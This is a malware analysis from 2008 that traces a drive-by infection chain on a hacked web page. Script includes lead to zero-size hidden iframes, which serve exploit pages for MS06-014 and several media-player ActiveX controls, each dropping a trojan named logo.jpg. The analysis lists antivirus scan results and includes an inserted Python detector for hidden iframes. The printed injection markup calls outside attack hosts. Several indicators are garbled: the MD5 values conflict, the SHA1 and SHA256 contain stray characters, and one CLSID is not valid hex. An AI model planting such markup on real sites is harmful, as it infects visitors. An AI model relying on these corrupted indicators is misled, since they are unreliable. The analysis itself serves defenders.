Logo.jpg/logo.exe


Endurer Original
2008-04-30, 1st version

The web page contains the code:
/---
<SCRIPT src="hxxp://www.Ol***D*rain.com/ads/iw_t.js"></SCRIPT>
---/

#1 hxxp://www.Ol***D*rain.com/ads/iw_t.js contains the code:
/---
<SCRIPT src = '/images/jin.gif'> </SCRIPT>
---/

#1.1 hxxp://www.Ol***D*rain.com/images/jin.gif contains JavaScript code. It checks the cookie mymy_ad and outputs the code:
/---
<Script language="JavaScript" src="hxxp://WW**.Shi**T*ip.com/file/my.js"></SCRIPT>
---/

#1.1.1 hxxp://WW**.Shi**T*ip.com/file/my.js contains the code:
/---
<Script language='javascript' src='hxxp://ad.Shi**T*ip.com/file/ad.js'></SCRIPT>
---/

#1.1.1.1 hxxp://ad.Shi**T*ip.com/file/ad.js outputs the code:
/---
<IFRAME width='0' Height='0' src='hxxp://WW**.Shi**T*ip.com/file/logo.htm'></iframe>
<IFRAME width='25' Height='0' src='hxxp://WW**.Shi**T*ip.com/file/xunlei.htm'></iframe>
<IFRAME width='0' Height='0' src='hxxp://WW**.Shi**T*ip.com/file/real.htm'></iframe>
<IFRAME width='0' Height='0' src='hxxp://WW**.Shi**T*ip.com/file/lz.htm'></iframe>
<IFRAME width='0' Height='0' src='hxxp://WW**.Shi**T*ip.com/file/bf.htm'></iframe>
<IFRAME width='0' Height='0' src='hxxp://WW**.Shi**T*ip.com/file/pps.htm'></iframe>
<IFRAME width='0' Height='0' src='hxxp://WW**.Shi**T*ip.com/file/sdr.htm'></iframe>
<IFRAME name='mycountif' width='0' Height='0'></iframe>
---/
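
A defender-side check for the pattern in the ad.js output above, added here as an example and not part of the original analysis: it flags iframes rendered with zero width or height, or hidden by inline style. The function and class names and the example.invalid host are assumptions, and the sample markup is constructed.

```python
import re
from html.parser import HTMLParser

# "0", "0px", "0%" ... but not "05" or "25"
ZERO = re.compile(r"^\s*0+(\.0+)?\s*(px|%|em|pt)?\s*$", re.I)
# display:none, visibility:hidden, or width/height of zero (not max-width etc.)
STYLE_HIDE = re.compile(
    r"(display\s*:\s*none|visibility\s*:\s*hidden|"
    r"(?<![-\w])(width|height)\s*:\s*0+(\.0+)?\s*(px|%|em|pt)?\s*(;|$))", re.I)

class HiddenFrameFinder(HTMLParser):
    """Collects <iframe> elements a visitor cannot see."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":              # HTMLParser lowercases tag names
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = [f"{dim}=0" for dim in ("width", "height")
                   if dim in a and ZERO.match(a[dim])]
        if STYLE_HIDE.search(a.get("style", "")):
            reasons.append("style hides frame")
        if reasons:
            self.findings.append({"src": a.get("src", ""), "reasons": reasons,
                                  "line": self.getpos()[0]})

def find_hidden_iframes(html):
    """Return one dict (src, reasons, line) per invisible iframe."""
    finder = HiddenFrameFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample; example.invalid stands in for the masked host.
SAMPLE = """\
<IFRAME width = '0' Height = '0' src='http://example.invalid/file/logo.htm'></iframe>
<IFRAME width='25' Height='0' src='http://example.invalid/file/xunlei.htm'></iframe>
<iframe width="600" height="400" src="http://example.invalid/video.htm"></iframe>
<iframe style="display:none" src="http://example.invalid/file/pps.htm"></iframe>
<IFRAME name='mycountif' width='0' Height='0'></iframe>
"""

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE):
        print(f["line"], f["src"] or "(no src)", ", ".join(f["reasons"]))
```
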

#1.1.1.1.1 hxxp://WW**.Shi**T*ip.com/file/logo.htm

Uses the MS06-014 vulnerability to download hxxp://WW**.Shi**T*ip.com/file/images/logo.jpg

File Description: D:/test/logo.jpg
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:31:44
Modification time: 12:31:44
Size: 30788 bytes, 30.68 KB
MD5: 497cd95b261c35e367c33010958cc7ac
Sha1: 1b4a5cd93d8c4fda-deaa8ba55f6a50de0ba4fae
CRC32: 3e7aaf5e

File 497cd95b261c35e0000c33010958cc7ac received at 2008.04.30 07:38:54 (CET)

Anti-Virus engine   Version       Last update Scan results
AhnLab-V3           2008.4.30.0   2008.04.29  -
AntiVir             7.8.0.10      2008.04.29  TR/dropper.gen
Authentium          4.93.8        2008.04.27  -
Avast               4.8.1169.0    2008.04.29  -
AVG                 7.5.0.516     2008.04.30  Clicker.NBD
BitDefender         7.2           2008.04.30  -
Cat-quickheal       9.50          2008.04.29  (Suspicious)-dnascan
ClamAV              0.92.1        2008.04.30  Pua.Packed.UPack-2
Drweb               4.44.0.09170  2008.04.29  -
Esafe               7.0.15.0      2008.04.28  -
ETrust-vet          31.3.5746     2008.04.30  -
Ewido               4.0           2008.04.29  -
F-Prot              4.4.2.54      2008.04.30  -
F-Secure            6.70.13260.0  2008.04.30  -
Fortinet            3.14.0.0      2008.04.29  -
Ikarus              T3.1.1.26     2008.04.30  Trojan-dropper
Kaspersky           7.0.0.125     2008.04.30  -
McAfee              5284          2008.04.29  New malware.AJ
Microsoft           None          2008.04.22  -
Nod32v2             3064          2008.04.29  Win32/trojanclicker.Agent.NCS
Norman              5.80.02       2008.04.29  -
Panda               9.0.0.4       2008.04.30  Suspicious File
Prevx1              V2            2008.04.30  -
Sophos              4.28.0        2008.04.30  Mal/packer
Sunbelt             3.0.1056.0    2008.04.17  Vipre.Suspicious
Symantec            10            2008.04.30  -
Thehacker           6.2.92.297    2008.04.29  W32/Behav-Heuristic-060
Vba32               3.12.6.5      2008.04.29  -
Virusbuster         4.3.26:9      2008.04.29  Packed/upack
Webwasher-Gateway   6.6.2         2008.04.30  Trojan.dropper.gen
Additional information
File Size: 30499 bytes
Md5...: f72b708b004a1ccfde0b3e10bced6cda
Sha1..: 439bac0bf2b84d09be5abce588b65bbb3cac55e9
Sha256: 60c6c4caa211c6fec6b011ba7d1574ce139854cb0fee5ca3591f31_f06e09c1
Peid ..:-
Peinfo :-
Packers: upack
Packers: pe_patch, upack

#1.1.1.1.2 hxxp://WW**.Shi**T*ip.com/file/xunlei.htm

Uses the Thunder (pplayer.xpplayer.1, CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F) vulnerability to download hxxp://WW**.Shi**T*ip.com/file/images/logo.jpg

#1.1.1.1.3 hxxp://WW**.Shi**T*ip.com/file/real.htm

Uses the RealPlayer (ierpctl.ierpctl.1) vulnerability to download hxxp://WW**.Shi**T*ip.com/file/images/logo.jpg

#1.1.1.1.4 hxxp://WW**.Shi**T*ip.com/file/lz.htm

Uses the Lianzhong (glchat.glchatctrl.1, CLSID: AE93C5DF-A990-11D1-AEBD-5254ABDD2B69) vulnerability to download hxxp://WW**.Shi**T*ip.com/file/images/logo.jpg

#1.1.1.1.5 hxxp://WW**.Shi**T*ip.com/file/bf.htm

Uses the storm sound (MPs.stormplayer, CLSID: 6be52e1d-e586-474f-a6e2-1a85a9b4d9fb) vulnerability to download hxxp://WW**.Shi**T*ip.com/file/images/logo.jpg

#1.1.1.1.6 hxxp://WW**.Shi**T*ip.com/file/pps.htm

Uses the PPStream (powerplayer.powerplayerctrl.1, CLSID: 5ec7c511-cd0f-42e6-830c-1bd9882f3458) vulnerability to download hxxp://WW**.Shi**T*ip.com/file/images/logo.jpg

#1.1.1.1.7 hxxp://WW**.Shi**T*ip.com/file/sdr.htm

Uses the superstar generator (CLSID: 7f5e27ce-4a5c-11d3-9232-rjb48a05b2) vulnerability to download hxxp://WW**.Shi**T*ip.com/file/images/logo.jpg
